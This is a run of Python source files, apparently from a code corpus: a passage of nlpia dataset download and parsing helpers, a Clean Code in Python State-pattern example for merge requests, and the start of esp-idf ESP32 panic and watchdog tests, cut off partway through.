log.info('Attempting to convert GloVE format to Word2vec: {} -> {}'.format(
repr(glove_input_file), repr(word2vec_output_file)))
try:
glove2word2vec(glove_input_file=glove_input_file, word2vec_output_file=word2vec_output_file)
except: # noqa
log.info('Failed to convert GloVE format to Word2vec: {} -> {}'.format(
repr(glove_input_file), repr(word2vec_output_file)))
txt_paths = [os.path.join(BIGDATA_PATH, f.lower()[:-4] + '.txt') for f in os.listdir(unzip_dir) if f.lower().endswith('.asc')]
for f, txt_file in zip(os.listdir(unzip_dir), txt_paths):
if f.lower().endswith('.asc'):
input_file = os.path.join(unzip_dir, f)
log.info('Renaming .asc file to .txt: {} -> {}'.format(
repr(input_file), repr(txt_file)))
shutil.move(input_file, txt_file)
return anki_paths + txt_paths + w2v_paths
def create_big_url(name):
""" If name looks like a url, with an http, add an entry for it in BIG_URLS """
# BIG side effect
global BIG_URLS
filemeta = get_url_filemeta(name)
if not filemeta:
return None
filename = filemeta['filename']
remote_size = filemeta['remote_size']
url = filemeta['url']
name = filename.split('.')
name = (name[0] if name[0] not in ('', '.') else name[1]).replace(' ', '-')
name = name.lower().strip()
BIG_URLS[name] = (url, int(remote_size or -1), filename)
return name
def get_ftp_filemeta(parsed_url, username='anonymous', password='<EMAIL>'):
""" FIXME: Get file size, hostname, path metadata from FTP server using parsed_url (urlparse)"""
return dict(
url=parsed_url.geturl(), hostname=parsed_url.hostname, path=parsed_url.path,
username=(parsed_url.username or username),
remote_size=-1,
filename=os.path.basename(parsed_url.path))
ftp = ftplib.FTP(parsed_url.hostname)
ftp.login(username, password)
ftp.cwd(parsed_url.path)
ftp.retrbinary("RETR " + filename, open(filename, 'wb').write)
ftp.quit()
def download_unzip(names=None, normalize_filenames=False, verbose=True):
r""" Download CSV or HTML tables listed in `names`, unzip and save to DATA_PATH/`names`.csv .txt etc.
TODO: move to web or data_utils or futils
Also normalizes file name extensions (.bin.gz -> .w2v.bin.gz).
Uses table in data_info.csv (internal DATA_INFO) to determine URL or file path from dataset name.
Also looks
If names or [names] is a valid URL then download it and create a name
from the url in BIG_URLS (not yet pushed to data_info.csv)
"""
names = [names] if isinstance(names, (str, basestring)) else names
# names = names or list(BIG_URLS.keys()) # download them all, if none specified!
file_paths = {}
for name in names:
created = create_big_url(name)
name = (created or name).lower().strip()
if name in BIG_URLS:
filepath = download_name(name, verbose=verbose)
if not filepath:
continue
file_paths[name] = normalize_ext_rename(filepath)
log.debug('downloaded name={} to filepath={}'.format(name, file_paths[name]))
fplower = file_paths[name].lower()
if fplower.endswith('.tar.gz'):
log.info('Extracting {}'.format(file_paths[name]))
file_paths[name] = untar(file_paths[name], verbose=verbose)
log.debug('download_untar.filepaths=' + str(file_paths))
elif file_paths[name].lower().endswith('.zip'):
file_paths[name] = unzip(file_paths[name], verbose=verbose)
log.debug('download_unzip.filepaths=' + str(file_paths))
else:
df = pd.read_html(DATA_INFO['url'][name], **DATA_INFO['downloader_kwargs'][name])[-1]
df.columns = clean_columns(df.columns)
file_paths[name] = os.path.join(DATA_PATH, name + '.csv')
df.to_csv(file_paths[name])
file_paths[name] = normalize_ext_rename(file_paths[name])
return file_paths
download = download_unzip
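# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal, hedged example of calling `download_unzip`/`download`. The dataset
# name 'cities' is assumed to be registered in BIG_URLS or DATA_INFO; any other
# registered name (or a raw URL) should behave the same way.
def _example_download_unzip():
    """Download one named dataset and log where its files landed (sketch)."""
    file_paths = download_unzip('cities', verbose=False)
    for name, path in file_paths.items():
        log.info('dataset %s -> %s', name, path)
    return file_paths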
def download_file(url, data_path=BIGDATA_PATH, filename=None, size=None, chunk_size=4096, normalize_filename=False, verbose=True):
"""Uses stream=True and a reasonable chunk size to be able to download large (GB) files over https
    Downloading this small file takes about 1.5 sec. All subsequent "downloads" take about 0.6 sec to verify the path and size.
>>> import time
>>> meta = BIG_URLS['ubuntu_dialog_test']
>>> pathend = os.path.join(*('nlpia/src/nlpia/bigdata/ubuntu_dialog_test.csv.gz'.split('/')))
>>> download_file(url=meta[0], verbose=False).endswith(pathend)
True
>>> t0 = time.time()
>>> localpath = download_file(url=BIG_URLS['ubuntu_dialog_test'][0], verbose=False)
>>> t1 = time.time()
>>> localpath is None or ((0.015 < (t1 - t0) < 5.0) and localpath.endswith(pathend))
True
>>> t0 = time.time()
>>> download_file(url=meta[0], size=meta[1], verbose=False).endswith(pathend)
True
>>> time.time() - t0 < 0.02
True
"""
if isinstance(url, (list, tuple)):
return [
download_file(
s, data_path=data_path, filename=filename, size=size, chunk_size=chunk_size, verbose=verbose)
for s in url]
if url.endswith('dl=0'):
url = url[:-1] + '1' # noninteractive Dropbox download
remote_size = size
# figure out what filename to expect after download and how big it should be
if filename is None:
filename = dropbox_basename(url)
filepath = os.path.join(data_path, filename)
if normalize_filename:
filepath = normalize_filepath(filepath)
log.info('expanded+normalized file path: {}'.format(filepath))
tqdm_prog = tqdm if verbose else no_tqdm
log.info('requesting URL: {}'.format(url))
log.info('remote_size: {}'.format(remote_size))
stat = path_status(filepath)
local_size = stat.get('size', None)
log.info('local_size: {}'.format(local_size))
r = None
if not remote_size or not stat['type'] == 'file' or not local_size >= remote_size or not stat['size'] > MIN_DATA_FILE_SIZE:
try:
r = requests_get(url, stream=True, allow_redirects=True, timeout=5)
remote_size = r.headers.get('Content-Length', -1)
except ConnectionError:
log.error('ConnectionError for url: {} => request {}'.format(url, r))
remote_size = -1 if remote_size is None else remote_size
except (InvalidURL, InvalidSchema, InvalidHeader, MissingSchema) as e:
log.warning(e)
log.warning('HTTP Error for url: {}\n request: {}\n traceback: {}'.format(url, r, format_exc()))
log.warning('This can happen for Google Word Vector download links to Dropbox or Google Docs.')
try:
remote_size = int(remote_size)
except ValueError:
remote_size = -1
# remote_size has changed so need to check it again
# TODO: check md5 or get the right size of remote file
if stat['type'] == 'file' and local_size >= remote_size and stat['size'] > MIN_DATA_FILE_SIZE:
r = r.close() if r else r
log.info('retained: {}'.format(filepath))
return filepath
filedir = os.path.dirname(filepath)
created_dir = mkdir_p(filedir)
log.info('data path created: {}'.format(created_dir))
assert os.path.isdir(filedir)
assert created_dir.endswith(filedir)
bytes_downloaded = 0
if r:
log.info('downloading to: {}'.format(filepath))
with open(filepath, 'wb') as f:
for chunk in tqdm_prog(r.iter_content(chunk_size=chunk_size), total=ceil(remote_size / float(chunk_size))):
bytes_downloaded += len(chunk)
if chunk: # filter out keep-alive chunks
f.write(chunk)
r.close()
else:
log.error(f'Unable to requests.get(url={url}) using request object {r}')
return None
log.debug('nlpia.loaders.download_file: bytes={}'.format(bytes_downloaded))
stat = path_status(filepath)
log.info("local file stat {}".format(stat))
log.debug("filepath={}: local_size={}, remote_size={}, downloaded_bytes={}".format(
filepath, size, remote_size, bytes_downloaded))
return filepath
def download_name(name, verbose=True, **kwargs):
meta = BIG_URLS[name]
size = meta[1] or -1
url = meta[0]
return download_file(url=url, size=size, verbose=verbose, normalize_filename=True, **kwargs)
# for filename in meta['filenames']
def read_named_csv(name, data_path=DATA_PATH, nrows=None, verbose=True):
""" Convert a dataset in a local file (usually a CSV) into a Pandas DataFrame
TODO: should be called read_named_dataset
Args:
        `name` is assumed not to have an extension (like ".csv"); alternative extensions are tried automatically.
"""
print(f"Loading file with name: {name}")
if os.path.isfile(name):
try:
return read_json(name)
except (IOError, UnicodeDecodeError, json.JSONDecodeError):
pass
try:
return read_csv(name, nrows=nrows)
except (IOError, pd.errors.ParserError):
pass
try:
return read_text(name, nrows=nrows)
except (IOError, UnicodeDecodeError):
pass
data_path = expand_filepath(data_path)
if os.path.isfile(os.path.join(data_path, name)):
return read_csv(os.path.join(data_path, name), nrows=nrows)
if name in DATASET_NAME2FILENAME:
filename = DATASET_NAME2FILENAME[name]
if filename.lower().endswith('.txt') or filename.lower().endswith('.txt.gz'):
return read_text(os.path.join(data_path, filename), nrows=nrows)
elif filename.lower().endswith('.bin.gz'):
return KeyedVectors.load_word2vec_format(os.path.join(BIGDATA_PATH, name + '.bin.gz'), binary=True)
try:
return read_csv(os.path.join(data_path, name + '.csv.gz'), nrows=nrows)
except IOError:
pass
try:
return read_csv(os.path.join(data_path, name + '.csv'), nrows=nrows)
except IOError:
pass
try:
return read_json(os.path.join(data_path, name + '.json'))
except IOError:
pass
try:
return read_text(os.path.join(data_path, name + '.txt'), verbose=verbose)
except IOError:
pass
# FIXME: mapping from short name to uncompressed filename
# BIGDATA files are usually not loadable into dataframes
filepath = os.path.join(BIGDATA_PATH, name + '.bin.gz')
if os.path.isfile(filepath):
try:
return KeyedVectors.load_word2vec_format(filepath, binary=True)
except ValueError:
pass
filepath = os.path.join(BIGDATA_PATH, name + '.txt')
if os.path.isfile(filepath):
return read_text(filepath, verbose=verbose)
def get_data(name='sms-spam', nrows=None, limit=None):
r""" Load data from a json, csv, or txt file if it exists in the data dir.
References:
[cities_air_pollution_index](https://www.numbeo.com/pollution/rankings.jsp)
[cities](http://download.geonames.org/export/dump/cities.zip)
[cities_us](http://download.geonames.org/export/dump/cities_us.zip)
>>> from nlpia.data.loaders import get_data
>>> words = get_data('words_ubuntu_us')
>>> len(words)
99171
>>> list(words[:8])
['A', "A's", "AA's", "AB's", "ABM's", "AC's", "ACTH's", "AI's"]
>>> get_data('ubuntu_dialog_test').iloc[0]
Context i think we could import the old comments via r...
Utterance basically each xfree86 upload will NOT force u...
Name: 0, dtype: object
>>> df = get_data('imdb_test')
>>> df.shape
(20, 3)
>>> df.columns
Index(['url', 'rating', 'text'], dtype='object')
>>> df.describe()
rating
count 20.000000
mean 5.450000
std 3.300319
min 1.000000
25% 3.000000
50% 5.500000
75% 8.250000
max 10.000000
"""
nrows = nrows or limit
if name in BIG_URLS:
log.info('Downloading {}'.format(name))
filepaths = download_unzip(name, normalize_filenames=True)
log.debug('nlpia.loaders.get_data.filepaths=' + str(filepaths))
filepath = filepaths[name][0] if isinstance(filepaths[name], (list, tuple)) else filepaths[name]
log.debug('nlpia.loaders.get_data.filepath=' + str(filepath))
filepathlow = filepath.lower()
if len(BIG_URLS[name]) >= 4:
kwargs = BIG_URLS[name][4] if len(BIG_URLS[name]) >= 5 else {}
return BIG_URLS[name][3](filepath, **kwargs)
if filepathlow.endswith('.w2v.txt'):
try:
return KeyedVectors.load_word2vec_format(filepath, binary=False, limit=nrows)
except (TypeError, UnicodeError):
pass
if filepathlow.endswith('.w2v.bin') or filepathlow.endswith('.bin.gz') or filepathlow.endswith('.w2v.bin.gz'):
try:
return KeyedVectors.load_word2vec_format(filepath, binary=True, limit=nrows)
except (TypeError, UnicodeError):
pass
if filepathlow.endswith('.gz'):
try:
filepath = ensure_open(filepath)
except: # noqa
pass
if re.match(r'.json([.][a-z]{0,3}){0,2}', filepathlow):
return read_json(filepath)
if filepathlow.endswith('.tsv.gz') or filepathlow.endswith('.tsv'):
try:
return pd.read_table(filepath)
except: # noqa
pass
if filepathlow.endswith('.csv.gz') or filepathlow.endswith('.csv'):
try:
return read_csv(filepath)
except: # noqa
pass
if filepathlow.endswith('.txt'):
try:
return read_text(filepath)
except (TypeError, UnicodeError):
pass
return filepaths[name]
elif name in DATASET_NAME2FILENAME:
return read_named_csv(name, nrows=nrows)
elif name in DATA_NAMES:
return read_named_csv(DATA_NAMES[name], nrows=nrows)
elif os.path.isfile(name):
return read_named_csv(name, nrows=nrows)
elif os.path.isfile(os.path.join(DATA_PATH, name)):
return read_named_csv(os.path.join(DATA_PATH, name), nrows=nrows)
    msg = 'Unable to find dataset "{}" in {} or {} (*.csv.gz, *.csv, *.json, *.zip, or *.txt)\n'.format(
name, DATA_PATH, BIGDATA_PATH)
msg += 'Available dataset names include:\n{}'.format('\n'.join(DATASET_NAMES))
log.error(msg)
raise IOError(msg)
def multifile_dataframe(paths=['urbanslang{}of4.csv'.format(i) for i in range(1, 5)], header=0, index_col=None):
"""Like pandas.read_csv, but loads and concatenates (df.append(df)s) DataFrames together"""
df = pd.DataFrame()
for p in paths:
df = df.append(read_csv(p, header=header, index_col=index_col), ignore_index=True if not index_col else False)
if index_col and df.index.name == index_col:
del df[index_col]
return df
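# --- Usage sketch (illustrative only) ---------------------------------------
# A hedged example of stitching several CSV shards into one DataFrame with
# `multifile_dataframe`. The 'urbanslang*of4.csv' shard names mirror the
# function's own defaults and are assumed to be present in the working directory.
def _example_multifile_dataframe():
    paths = ['urbanslang{}of4.csv'.format(i) for i in range(1, 5)]
    df = multifile_dataframe(paths=paths, header=0)
    log.info('concatenated %s rows from %s shards', len(df), len(paths))
    return df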
def get_wikidata_qnum(wikiarticle, wikisite):
"""Retrieve the Query number for a wikidata database of metadata about a particular article
>>> print(get_wikidata_qnum(wikiarticle="Andromeda Galaxy", wikisite="enwiki"))
Q2469
"""
resp = requests_get('https://www.wikidata.org/w/api.php', timeout=5, params={
'action': 'wbgetentities',
'titles': wikiarticle,
'sites': wikisite,
'props': '',
'format': 'json'
}).json()
return list(resp['entities'])[0]
DATASET_FILENAMES = [f['name'] for f in find_files(DATA_PATH, ext='.csv.gz', level=0)]
DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.csv', level=0)]
DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.json', level=0)]
DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.txt', level=0)]
DATASET_NAMES = [
f[:-4] if f.endswith('.csv') else f for f in [os.path.splitext(f)[0] for f in DATASET_FILENAMES]]
DATASET_NAME2FILENAME = dict(sorted(zip(DATASET_NAMES, DATASET_FILENAMES)))
def str2int(s):
s = ''.join(c for c in s if c in '0123456789')
return int(s or INT_MIN)
def clean_toxoplasmosis(url='http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm'):
    dfs = pd.read_html(url, header=0)
df = dfs[0].copy()
df.columns = normalize_column_names(df.columns)
df = df.dropna().copy()
df['extrapolated_prevalence'] = df['extrapolated_prevalence'].apply(str2int)
df['population_estimated_used'] = df['population_estimated_used'].apply(str2int)
df['frequency'] = df.extrapolated_prevalence.astype(float) / df.population_estimated_used
return df
def normalize_column_names(df):
r""" Clean up whitespace in column names. See better version at `pugnlp.clean_columns`
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['Hello World', 'not here'])
>>> normalize_column_names(df)
['hello_world', 'not_here']
"""
columns = df.columns if hasattr(df, 'columns') else df
columns = [c.lower().replace(' ', '_') for c in columns]
return columns
def clean_column_values(df, inplace=True):
r""" Convert dollar value strings, numbers with commas, and percents into floating point values
>>> df = get_data('us_gov_deficits_raw')
>>> df2 = clean_column_values(df, inplace=False)
>>> df2.iloc[0]
Fiscal year 10/2017-3/2018
President's party R
Senate majority party R
House majority party R
Top-bracket marginal income tax rate 38.3
National debt millions 2.10896e+07
National debt millions of 1983 dollars 8.47004e+06
Deficit\n(millions of 1983 dollars) 431443
Surplus string in 1983 dollars NaN
Deficit string in 1983 dollars ($ = $10B) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Net surplus in 1983 dollars ($B) -430
Name: 0, dtype: object
"""
dollars_percents = re.compile(r'[%$,;\s]+')
if not inplace:
df = df.copy()
for c in df.columns:
values = None
if df[c].dtype.char in '<U S O'.split():
try:
values = df[c].copy()
values = values.fillna('')
values = values.astype(str).str.replace(dollars_percents, '')
# values = values.str.strip().str.replace(dollars_percents, '').str.strip()
if values.str.len().sum() > .2 * df[c].astype(str).str.len().sum():
values[values.isnull()] = np.nan
values[values == ''] = np.nan
values = values.astype(float)
except ValueError:
values = None
except: # noqa
log.error('Error on column {} with dtype {}'.format(c, df[c].dtype))
raise
if values is not None:
if values.isnull().sum() < .6 * len(values) and values.any():
df[c] = values
return df
def load_geonames(filepath='http://download.geonames.org/export/dump/cities1000.zip'):
"""Clean the table of city metadata from download.geoname.org/export/dump/{filename}
Reference:
http://download.geonames.org/export/dump/readme.txt
'cities1000.txt' and 'allCountries.txt' have the following tab-separated fields:
0 geonameid : integer id of record in geonames database
1 name : name of geographical point (utf8) varchar(200)
2 asciiname : name of geographical point in plain ascii characters, varchar(200)
3 alternatenames : alternatenames, comma separated, ascii names automatically transliterated,
convenience attribute from alternatename table, varchar(10000)
4 latitude : latitude in decimal degrees (wgs84)
5 longitude : longitude in decimal degrees (wgs84)
6 feature class : see http://www.geonames.org/export/codes.html, char(1)
7 feature code : see http://www.geonames.org/export/codes.html, varchar(10)
8 country code : ISO-3166 2-letter country code, 2 characters
9 cc2 : alternate country codes, comma separated, ISO-3166 2-letter country code, 200 characters
10 admin1 code : fipscode (subject to change to iso code), see exceptions below,
see file admin1Codes.txt for display names of this code; varchar(20)
11 admin2 code : code for the second administrative division, a county in the US,
see file admin2Codes.txt; varchar(80)
12 admin3 code : code for third level administrative division, varchar(20)
13 admin4 code : code for fourth level administrative division, varchar(20)
14 population : bigint (8 byte int)
15 elevation : in meters, integer
16 dem : digital elevation model, srtm3 or gtopo30, average elevation of
(3''x3''ca 90mx90m) or 30''x30''(ca 900mx900m) area in meters, integer.
srtm processed by cgiar/ciat.
17 timezone : the iana timezone id (see file timeZone.txt) varchar(40)
18 modification date : date of last modification in yyyy-MM-dd format
"""
columns = ['geonameid', 'name', 'asciiname', 'alternatenames', 'latitude', 'longitude', 'feature class',
'feature code', 'country code']
columns += ['cc2', 'admin1_code', 'admin2_code', 'admin3_code', 'admin4_code', 'population', 'elevation',
'dem', 'timezone', 'modification date']
columns = normalize_column_names(columns)
df = pd.read_csv(filepath, sep='\t', index_col=None, low_memory=False, header=None)
df.columns = columns
return df
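# --- Usage sketch (illustrative only) ---------------------------------------
# A hedged example of loading the GeoNames city table with `load_geonames` and
# filtering it on the normalized `population` column. The default cities1000.zip
# URL is used and the 1M population cutoff is arbitrary, chosen only to show the
# normalized column names in action.
def _example_load_geonames():
    cities = load_geonames()
    big_cities = cities[cities['population'] > 1000000]
    log.info('%s of %s cities have population > 1M', len(big_cities), len(cities))
    return big_cities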
def load_geo_adwords(filename='AdWords API Location Criteria 2017-06-26.csv.gz'):
""" WARN: Not a good source of city names. This table has many errors, even after cleaning"""
df = pd.read_csv(filename, header=0, index_col=0, low_memory=False)
df.columns = [c.replace(' ', '_').lower() for c in df.columns]
canonical = pd.DataFrame([list(row) for row in df.canonical_name.str.split(',').values])
def cleaner(row):
cleaned = np.array(
[s for i, s in enumerate(row.values) if s not in ('Downtown', None) and (i > 3 or row[i + 1] != s)])
if len(cleaned) == 2:
cleaned = [cleaned[0], None, cleaned[1], None, None]
else:
cleaned = list(cleaned) + [None] * (5 - len(cleaned))
if not np.all(np.array(row.values)[:3] == np.array(cleaned)[:3]):
log.info('{} => {}'.format(row.values, cleaned))
return list(cleaned)
cleancanon = canonical.apply(cleaner, axis=1)
cleancanon.columns = 'city region country extra extra2'.split()
df['region'] = cleancanon.region
df['country'] = cleancanon.country
return df
def clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip', subdir='cornell movie-dialogs corpus'):
""" Load a dataframe of ~100k raw (uncollated) movie lines from the cornell movies dialog corpus
>>> local_filepath = download_file(BIG_URLS['cornell_movie_dialogs_corpus'][0])
>>> df = clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip')
>>> df.describe(include='all')
user movie person utterance
count 304713 304713 304713 304446
unique 9035 617 5356 265783
top u4525 m289 JACK What?
freq 537 1530 3032 1684
"""
fullpath_zipfile = find_filepath(filename)
dirname = os.path.basename(filename)
subdir = 'cornell movie-dialogs corpus'
if fullpath_zipfile.lower().endswith('.zip'):
retval = unzip(fullpath_zipfile)
log.debug(f'unzip({fullpath_zipfile}) return value: {retval}')
dirname = dirname[:-4]
fullpath_movie_lines = os.path.join(BIGDATA_PATH, dirname, subdir, 'movie_lines.txt')
dialog = pd.read_csv(
fullpath_movie_lines, sep=r'\+\+\+\$\+\+\+', engine='python', header=None, index_col=0)
dialog.columns = 'user movie person utterance'.split()
dialog.index.name = 'line'
dialog.index = [int(s.strip()[1:]) for s in dialog.index.values]
dialog.sort_index(inplace=True)
for col in dialog.columns:
dialog[col] = dialog[col].str.strip()
return dialog
def isglove(filepath):
""" Get the first word vector in a GloVE file and return its dimensionality or False if not a vector
>>> isglove(os.path.join(DATA_PATH, 'cats_and_dogs.txt'))
False
"""
with ensure_open(filepath, 'r') as f:
header_line = f.readline()
vector_line = f.readline()
try:
num_vectors, num_dim = header_line.split()
return int(num_dim)
except (ValueError, TypeError):
pass
vector = vector_line.split()[1:]
if len(vector) % 10:
print(vector)
print(len(vector) % 10)
return False
try:
vector = np.array([float(x) for x in vector])
except (ValueError, TypeError):
return False
if np.all(np.abs(vector) < 12.):
return len(vector)
return False
def nlp(texts, lang='en', linesep=None, verbose=True):
r""" Use the SpaCy parser to parse and tag natural language strings.
Load the SpaCy parser language model lazily and share it among all nlpia modules.
Probably unnecessary, since SpaCy probably takes care of this with `spacy.load()`
>>> doc = nlp("Domo arigatto Mr. Roboto.")
>>> doc.text
'Domo arigatto Mr. Roboto.'
>>> doc.ents
(Roboto,)
>>> docs = nlp("Hey Mr. Tangerine Man!\nPlay a song for me.\n", linesep='\n')
>>> doc = docs[0]
>>> [t for t in doc]
[Hey, Mr., Tangerine, Man, !]
>>> [tok.text for tok in doc]
['Hey', 'Mr.', 'Tangerine', 'Man', '!']
>>> [(tok.text, tok.tag_) for tok in doc]
[('Hey', 'UH'),
('Mr.', 'NNP'),
('Tangerine', 'NNP'),
('Man', 'NNP'),
('!', '.')]
>>> [(ent.text, ent.ent_id, ent.has_vector, ent.vector[:3].round(3)) for ent in doc.ents]
[('Tangerine', 0, True, array([0.678, 0.134, 2.162], dtype=float32))]
"""
    # NOTE: the module-level `_parse` cache below means the language model is loaded once
    # and shared, so a different model can't be loaded elsewhere in this module.
linesep = os.linesep if linesep in ('default', True, 1, 'os') else linesep
tqdm_prog = no_tqdm if (not verbose or (hasattr(texts, '__len__') and len(texts) < 3)) else tqdm
global _parse
if not _parse:
try:
_parse = spacy.load(lang)
        except (OSError, IOError):
            try:
                spacy.cli.download(lang)
                _parse = spacy.load(lang)  # load the model once the download succeeds
            except URLError:
                log.warning("Unable to download Spacy language model '{}' so nlp(text) just returns text.split()".format(lang))
parse = _parse or str.split
# TODO: reverse this recursion (str first then sequence) to allow for sequences of sequences of texts
if isinstance(texts, str):
if linesep:
return nlp(texts.split(linesep))
else:
return nlp([texts])
if hasattr(texts, '__len__'):
if len(texts) == 1:
return parse(texts[0])
elif len(texts) > 1:
return [(parse or str.split)(text) for text in tqdm_prog(texts)]
else:
return None
else:
# return generator if sequence of strings doesn't have __len__ which means its an iterable or generator itself
return (parse(text) for text in tqdm_prog(texts))
# TODO: return the same type as the input, e.g. `type(texts)(texts)`
def clean_win_tsv(filepath=os.path.join(DATA_PATH, 'Products.txt'),
index_col=False, sep='\t', lineterminator='\r', error_bad_lines=False, **kwargs):
""" Load and clean tab-separated files saved on Windows OS ('\r\n') """
df = pd.read_csv(filepath, index_col=index_col, sep=sep, lineterminator=lineterminator,
error_bad_lines=error_bad_lines, **kwargs)
index_col = df.columns[0]
original_len = len(df)
if df[index_col].values[-1] == '\n':
df.iloc[-1, 0] = np.nan
original_len = len(df) - 1
df.dropna(how='all', inplace=True)
df[index_col] = df[index_col].str.strip().apply(lambda x: x if x else str(INT_MIN)).astype(int)
df = df[~(df[index_col] == INT_NAN)]
df.set_index(index_col, inplace=True)
if len(df) != original_len:
        log.warning(('Loaded {} rows from tsv. Original file, "{}", contained {} seemingly valid lines. ' +
                     'Index column: {}').format(len(df), filepath, original_len, index_col))
return df
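# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal, hedged example of `clean_win_tsv` on its own default
# DATA_PATH/Products.txt file (assumed to exist and to use Windows '\r\n'
# line endings, as the function expects).
def _example_clean_win_tsv():
    df = clean_win_tsv()
    log.info('loaded %s rows indexed by %s', len(df), df.index.name)
    return df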
|
Chapter09/state_2.py
|
shoshan/Clean-Code-in-Python
| 402 |
66943
|
"""Clean Code in Python - Chapter 9: Common Design Patterns
> State
"""
import abc
from log import logger
from state_1 import InvalidTransitionError
class MergeRequestState(abc.ABC):
def __init__(self, merge_request):
self._merge_request = merge_request
@abc.abstractmethod
def open(self):
...
@abc.abstractmethod
def close(self):
...
@abc.abstractmethod
def merge(self):
...
def __str__(self):
return self.__class__.__name__
class Open(MergeRequestState):
def open(self):
self._merge_request.approvals = 0
def close(self):
self._merge_request.approvals = 0
self._merge_request.state = Closed
def merge(self):
logger.info("merging %s", self._merge_request)
logger.info("deleting branch %s", self._merge_request.source_branch)
self._merge_request.state = Merged
class Closed(MergeRequestState):
def open(self):
logger.info("reopening closed merge request %s", self._merge_request)
self._merge_request.state = Open
def close(self):
"""Current state."""
def merge(self):
raise InvalidTransitionError("can't merge a closed request")
class Merged(MergeRequestState):
def open(self):
raise InvalidTransitionError("already merged request")
def close(self):
raise InvalidTransitionError("already merged request")
def merge(self):
"""Current state."""
class MergeRequest:
def __init__(self, source_branch: str, target_branch: str) -> None:
self.source_branch = source_branch
self.target_branch = target_branch
self._state: MergeRequestState
self.approvals = 0
self.state = Open
@property
def state(self):
return self._state
@state.setter
def state(self, new_state_cls):
self._state = new_state_cls(self)
@property
def status(self):
return str(self.state)
def __getattr__(self, method):
return getattr(self.state, method)
def __str__(self):
return f"{self.target_branch}:{self.source_branch}"
|
tools/test_apps/system/panic/app_test.py
|
lovyan03/esp-idf
| 8,747 |
66953
|
#!/usr/bin/env python
import sys
import panic_tests as test
from test_panic_util.test_panic_util import panic_test, run_all
# test_task_wdt
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_task_wdt(env, _extra_data):
test.task_wdt_inner(env, 'panic')
@panic_test()
def test_coredump_task_wdt_uart_elf_crc(env, _extra_data):
test.task_wdt_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_task_wdt_uart_bin_crc(env, _extra_data):
test.task_wdt_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_task_wdt_flash_elf_sha(env, _extra_data):
test.task_wdt_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_task_wdt_flash_bin_crc(env, _extra_data):
test.task_wdt_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_task_wdt(env, _extra_data):
test.task_wdt_inner(env, 'gdbstub')
# test_int_wdt
@panic_test()
def test_panic_int_wdt(env, _extra_data):
test.int_wdt_inner(env, 'panic')
@panic_test()
def test_coredump_int_wdt_uart_elf_crc(env, _extra_data):
test.int_wdt_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_int_wdt_uart_bin_crc(env, _extra_data):
test.int_wdt_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_int_wdt_flash_elf_sha(env, _extra_data):
test.int_wdt_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_int_wdt_flash_bin_crc(env, _extra_data):
test.int_wdt_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_int_wdt(env, _extra_data):
test.int_wdt_inner(env, 'gdbstub')
# test_int_wdt_cache_disabled
@panic_test()
def test_panic_int_wdt_cache_disabled(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'panic')
@panic_test()
def test_coredump_int_wdt_cache_disabled_uart_elf_crc(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_int_wdt_cache_disabled_uart_bin_crc(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_int_wdt_cache_disabled_flash_elf_sha(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_int_wdt_cache_disabled_flash_bin_crc(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_int_wdt_cache_disabled(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'gdbstub')
# test_cache_error
@panic_test()
def test_panic_cache_error(env, _extra_data):
test.cache_error_inner(env, 'panic')
@panic_test()
def test_coredump_cache_error_uart_elf_crc(env, _extra_data):
test.cache_error_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_cache_error_uart_bin_crc(env, _extra_data):
test.cache_error_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_cache_error_flash_elf_sha(env, _extra_data):
test.cache_error_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_cache_error_flash_bin_crc(env, _extra_data):
test.cache_error_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_cache_error(env, _extra_data):
test.cache_error_inner(env, 'gdbstub')
# test_stack_overflow
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_stack_overflow(env, _extra_data):
test.stack_overflow_inner(env, 'panic')
@panic_test()
def test_coredump_stack_overflow_uart_elf_crc(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_stack_overflow_uart_bin_crc(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_stack_overflow_flash_elf_sha(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_stack_overflow_flash_bin_crc(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_stack_overflow(env, _extra_data):
test.stack_overflow_inner(env, 'gdbstub')
# test_instr_fetch_prohibited
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_instr_fetch_prohibited(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'panic')
@panic_test()
def test_coredump_instr_fetch_prohibited_uart_elf_crc(env, _extra_data):
